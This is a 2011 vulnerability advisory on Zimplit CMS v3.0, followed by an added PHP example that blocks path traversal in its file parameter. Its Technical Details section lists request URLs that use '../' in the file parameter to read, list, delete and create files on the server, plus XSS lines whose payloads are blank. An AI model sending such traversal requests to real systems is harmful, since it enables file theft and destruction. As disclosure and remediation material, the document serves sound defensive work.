Advisory: Multiple vulnerabilities in Zimplit CMS
Advisory ID: SSCHADV2011-012
Author: Stefan Schurtz
Affected Software: v3.0
Vendor URL: http://www.zimplit.com/
Vendor Status: informed
CVE-ID: -

======================
Vulnerability Description:
======================

The Zimplit CMS is prone to multiple vulnerabilities.

==============
Technical Details:
==============

Cross-Site-Scripting

http:///zimplit.php?lang=
http:///zimplit.php?lang=

There are some LFI possibilities with the zimplit.php file; it's possible to read some files on the system:

http:///zimplit.php?action=load&file=../../

browse the filesystem:

http:///zimplit.php?action=listAllFiles&file=../../../../

delete files:

http:///zimplit.php?action=delete&file=../

create files:

http:///zimplit.php?action=new&file=../

=====
Solution:
=====

-

================
Disclosure Timeline:
================

04-Sep-2011 - informed developers
05-Sep-2011 - Release date of this security advisory

====
Credits:
====

Vulnerability found and advisory written by Stefan Schurtz.

=======
References:
=======

http://www.zimplit.com/
http://www.rul3z.de/advisories/SSCHADV2011-012.txt
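The advisory lists no vendor fix, so here is an added example, not Zimplit's code, of how a handler for the load/listAllFiles/delete/new actions in the Technical Details section can confine the user-supplied file parameter to the content directory and reject the ../ traversal shown above. The content root, function name and request handling are assumptions for illustration.

```php
<?php
// Added example (not part of Zimplit): confine a user-supplied "file" value
// to one directory so that "../" sequences cannot reach files outside it.
// $baseDir is an assumed location; point it at the real content root.

function resolveContentPath(string $baseDir, string $userFile): ?string
{
    $base = realpath($baseDir);
    if ($base === false) {
        return null; // content root missing or unreadable
    }
    // NUL bytes and absolute paths are never legitimate file names here.
    if ($userFile === '' || strpos($userFile, "\0") !== false
        || $userFile[0] === '/' || $userFile[0] === '\\') {
        return null;
    }
    // Normalise lexically first, so a path to a not-yet-existing file
    // (the "new" action) can still be checked for containment.
    $parts = [];
    foreach (preg_split('~[\\\\/]+~', $userFile) as $segment) {
        if ($segment === '' || $segment === '.') {
            continue;
        }
        if ($segment === '..') {
            if (empty($parts)) {
                return null; // attempt to climb above the content root
            }
            array_pop($parts);
            continue;
        }
        $parts[] = $segment;
    }
    if (empty($parts)) {
        return null; // nothing left after normalisation (e.g. "../")
    }
    $candidate = $base . DIRECTORY_SEPARATOR . implode(DIRECTORY_SEPARATOR, $parts);
    // For targets that already exist, also check the resolved path so a
    // symlink inside the content root cannot point back outside it.
    $resolved = realpath($candidate);
    if ($resolved !== false && strpos($resolved, $base . DIRECTORY_SEPARATOR) !== 0) {
        return null;
    }
    return $candidate;
}

// Hypothetical use inside the action handlers:
// $path = resolveContentPath(__DIR__ . '/content', $_GET['file'] ?? '');
// if ($path === null) { http_response_code(400); exit('invalid file'); }
```

With this check, every request in the advisory's traversal examples (`file=../../`, `file=../`) returns null and is refused before any read, list, delete or create takes place.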